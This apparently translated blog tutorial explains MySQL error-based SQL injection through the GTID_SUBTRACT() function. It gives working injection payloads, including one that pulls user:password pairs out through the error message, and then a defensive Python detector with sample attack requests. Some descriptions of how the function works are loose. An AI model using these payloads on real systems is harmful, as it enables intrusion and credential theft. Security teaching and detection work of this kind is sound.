[SQL injection: error-based injection 2] GTID_SUBTRACT() function error injection



(Note: pay attention to the version requirements.)

GTID_SUBTRACT() error injection

1. Syntax introduction:

Version:

MySQL >=5.6

GTID_SUBTRACT() is a MySQL function that calculates the difference between two global transaction identifiers (GTIDs). The GTID is a global transaction identifier introduced in MySQL 5.6 and is used to track transactions in the database.


Syntax:

GTID_SUBTRACT(gtid_set, gtid)

Here gtid_set is a GTID set and gtid is a single GTID. The function returns a new GTID set representing what remains after subtracting gtid from gtid_set.


Principle:

  1. First, split gtid_set into individual GTIDs.
  2. Then iterate through each GTID and check whether it is the same as gtid. If it is, remove it from gtid_set.
  3. Finally, reassemble the remaining GTIDs into a new GTID set and return it.


Use cases:

  1. Database replication: When a transaction is executed on the master database, a GTID is generated and passed to the slave database. The slave database can use the GTID_SUBTRACT() function to calculate the difference between the master and slave databases to determine which data needs to be replicated.
  2. Database migration: When you need to migrate data from one database to another, you can use the GTID_SUBTRACT() function to calculate the difference between the two databases and copy only the data in the difference.



2. The reason for the error

Cause:

1. The GTID (Global Transaction ID) is a unique identifier used to identify global transactions in MySQL.

2. The GTID_SUBTRACT() function can be used to calculate the difference between two GTID sets to determine which transactions exist in one GTID set but not in the other.

3. SQL code is injected into the gtid_set1 or gtid_set2 parameter. When GTID_SUBTRACT() is executed, the injected code is executed as well; because its result is not a valid GTID set, MySQL raises an error, and the error message contains that result.


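Payload:

select GTID_SUBTRACT(user(),1)

') or gtid_subtract(concat(0x7e,(SELECT GROUP_CONCAT(user,':',password) from 表名),0x7e),1)--+

// 表名 is a placeholder for the table name
// GROUP_CONCAT() combines the selected values into one string
// concat() joins strings
// 0x7e is the tilde character (~)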


Illustration:

root@localhost
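
A defensive check for the behaviour described above, as an added example that is not part of the original post: it flags requests whose decoded parameters call GTID_SUBTRACT() (a replication function that ordinary web input has no reason to contain) and responses that expose MySQL's "Malformed GTID set specification" error text. The event format, function names and sample events are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# GTID_SUBTRACT followed by "(", allowing whitespace or inline SQL comments between.
CALL_RE = re.compile(r"gtid_subtract(?:\s|/\*.*?\*/)*\(", re.IGNORECASE | re.DOTALL)
# Text of MySQL error 1772; the rejected argument is echoed between the quotes.
LEAK_RE = re.compile(r"Malformed GTID set specification '(.*?)'", re.DOTALL)

def decode(value, rounds=3):
    """URL-decode until stable (bounded) so encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def request_calls_gtid_subtract(raw_request):
    """True if the decoded request contains a GTID_SUBTRACT( call."""
    return bool(CALL_RE.search(decode(raw_request)))

def redact_leak(body):
    """Return (body with the echoed value masked, True if the error text was present)."""
    redacted, hits = LEAK_RE.subn("Malformed GTID set specification '[redacted]'", body)
    return redacted, hits > 0

def triage(events):
    """events: iterable of (request_line, response_body) pairs (assumed format)."""
    findings = []
    for idx, (req, body) in enumerate(events):
        attempted = request_calls_gtid_subtract(req)
        _, leaked = redact_leak(body)
        if attempted or leaked:
            findings.append({"event": idx, "attempted": attempted, "leaked": leaked})
    return findings

# Constructed sample events (not real traffic), using the payload shown above.
SAMPLE_EVENTS = [
    ("GET /item?id=42", "<html>ok</html>"),
    ("GET /item?id=1%27)%20or%20GTID_SUBTRACT(user()%2C1)--+",
     "ERROR 1772 (HY000): Malformed GTID set specification 'root@localhost'."),
    ("GET /item?id=1%27)%20or%20gtid_subtract(user(),1)--+", "<html>error</html>"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

An event with attempted set but leaked unset means the application hid the database error; any event with leaked set means raw MySQL error text reached the client, which is the condition that lets this technique return data.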

 




Origin blog.csdn.net/qq_53079406/article/details/131635814